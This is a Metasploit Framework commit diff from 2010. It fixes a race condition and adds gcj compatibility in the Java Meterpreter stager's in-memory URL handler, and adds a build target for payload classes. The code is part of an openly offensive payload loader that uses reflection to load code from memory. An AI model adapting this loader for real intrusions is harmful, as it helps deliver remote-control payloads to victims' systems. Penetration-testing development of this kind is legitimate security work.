merge patches to fix a race condition in java meterpreter stager and a compatibility fix for gcj-based JVMs, thanks mihi\! java meterpreter now works with tomcat_mgr_deploy, see #3009

git-svn-id: file:///home/svn/framework3/trunk@10864 4d416f70-5f16-0410-b530-b9f4589650da
2010-11-02 19:59:57 +00:00 · 2010-11-02 19:59:57 +00:00 · dcb850f56a
parent 313317224f
commit dcb850f56a
9 changed files with 63 additions and 8 deletions
--- a/data/java/com/metasploit/meterpreter/MemoryBufferURLConnection.class
+++ b/data/java/com/metasploit/meterpreter/MemoryBufferURLConnection.class
--- a/data/java/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class
+++ b/data/java/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class
--- a/data/java/metasploit/Payload.class
+++ b/data/java/metasploit/Payload.class
--- a/data/java/metasploit/PayloadServlet.class
+++ b/data/java/metasploit/PayloadServlet.class
--- a/external/source/javapayload/JavaPayload4Meterpreter.jar
+++ b/external/source/javapayload/JavaPayload4Meterpreter.jar
--- a/external/source/javapayload/build.xml
+++ b/external/source/javapayload/build.xml
@ -7,7 +7,7 @@

 	<target name="compile">
 		<mkdir dir="build" />
-		<javac srcdir="src" destdir="build" source="1.1" target="1.1" debug="no" />
+		<javac srcdir="src" destdir="build" source="1.1" target="1.1" classpath="lib/servlet-api-2.2.jar" debug="no" />
 	</target>

 	<target name="jar" depends="compile">
@ -65,4 +65,14 @@
 		</jar>
 		<delete file="build/metasploit.dat"/>
 	</target>
+	
+	<target name="deploy" depends="compile">
+		<copy todir="../../../data/java">
+			<fileset dir="build">
+				<exclude name="javapayload/stage/JSh*.class" />
+				<exclude name="javapayload/stage/SendParameters.class" />
+				<exclude name="javapayload/stage/SystemInfo.class" />
+			</fileset>
+		</copy>
+	</target>
 </project>
--- a/external/source/javapayload/lib/servlet-api-2.2.jar
+++ b/external/source/javapayload/lib/servlet-api-2.2.jar
--- a/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLConnection.java
+++ b/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLConnection.java
@ -8,8 +8,8 @@ import java.net.MalformedURLException;
 import java.net.URL;
 import java.net.URLConnection;
 import java.util.ArrayList;
-import java.util.Hashtable;
 import java.util.List;
+import java.util.Map;

 /**
 * An {@link URLConnection} for an URL that is stored completely in memory.
@ -23,10 +23,42 @@ public class MemoryBufferURLConnection extends URLConnection {
 	static {
 		// tweak the cache of already loaded protocol handlers via reflection
 		try {
-			Field fld = URL.class.getDeclaredField("handlers");
+			Field fld;
+			try {
+				fld = URL.class.getDeclaredField("handlers");
+			} catch (NoSuchFieldException ex) {
+				try {
+					// GNU Classpath (libgcj) calls this field differently
+					fld = URL.class.getDeclaredField("ph_cache");					
+				} catch (NoSuchFieldException ex2) {
+					// throw the original exception
+					throw ex;
+				}
+			}
 			fld.setAccessible(true);
-			Hashtable handlers = (Hashtable) fld.get(null);
-			handlers.put("metasploitmembuff", new MemoryBufferURLStreamHandler());
+			Map handlers = (Map) fld.get(null);
+			// Note that although this is a static initializer, it can happen 
+			// that two threads are entering this spot at the same time: When
+			// there is more than one classloader context (e. g. in a servlet
+			// container with Spawn=0) and more than one of them is loading
+			// a copy of this class at the same time. Work around this by
+			// letting all of them use the same URL stream handler object.
+			synchronized(handlers) {
+				// do not use the "real" class name here as the same class
+				// loaded in different classloader contexts is not the same
+				// one for Java -> ClassCastException
+				Object /*MemoryBufferURLStreamHandler*/ handler;
+				
+				if (handlers.containsKey("metasploitmembuff")) {
+					handler = handlers.get("metasploitmembuff");
+				} else {
+					handler = new MemoryBufferURLStreamHandler();
+					handlers.put("metasploitmembuff", handler);
+				}
+				
+				// for the same reason, use reflection to obtain the files List
+				files = (List) handler.getClass().getMethod("getFiles", new Class[0]).invoke(handler, new Object[0]);
+			}
 		} catch (Exception ex) {
 			throw new RuntimeException(ex.toString());
 		}
@ -36,8 +68,10 @@ public class MemoryBufferURLConnection extends URLConnection {
 	 * Create a new URL from a byte array and its content type.
 	 */
 	public static URL createURL(byte[] data, String contentType) throws MalformedURLException {
-		files.add(data);
-		return new URL("metasploitmembuff", "", (files.size() - 1) + "/" + contentType);
+		synchronized(files) {
+			files.add(data);
+			return new URL("metasploitmembuff", "", (files.size() - 1) + "/" + contentType);
+		}
 	}

 	private final byte[] data;
@ -47,7 +81,9 @@ public class MemoryBufferURLConnection extends URLConnection {
 		super(url);
 		String file = url.getFile();
 		int pos = file.indexOf('/');
-		data = (byte[]) files.get(Integer.parseInt(file.substring(0, pos)));
+		synchronized (files) {
+			data = (byte[]) files.get(Integer.parseInt(file.substring(0, pos)));
+		}
 		contentType = file.substring(pos + 1);
 	}

--- a/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.java
+++ b/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.java
@ -4,6 +4,8 @@ import java.io.IOException;
 import java.net.URL;
 import java.net.URLConnection;
 import java.net.URLStreamHandler;
+import java.util.ArrayList;
+import java.util.List;

 /**
 * An {@link URLStreamHandler} for a {@link MemoryBufferURLConnection}
@ -11,7 +13,14 @@ import java.net.URLStreamHandler;
 * @author mihi
 */
 public class MemoryBufferURLStreamHandler extends URLStreamHandler {
+
+	private List files = new ArrayList();
+
 	protected URLConnection openConnection(URL u) throws IOException {
 		return new MemoryBufferURLConnection(u);
 	}
+	
+	public List getFiles() {
+		return files;
+	}
 }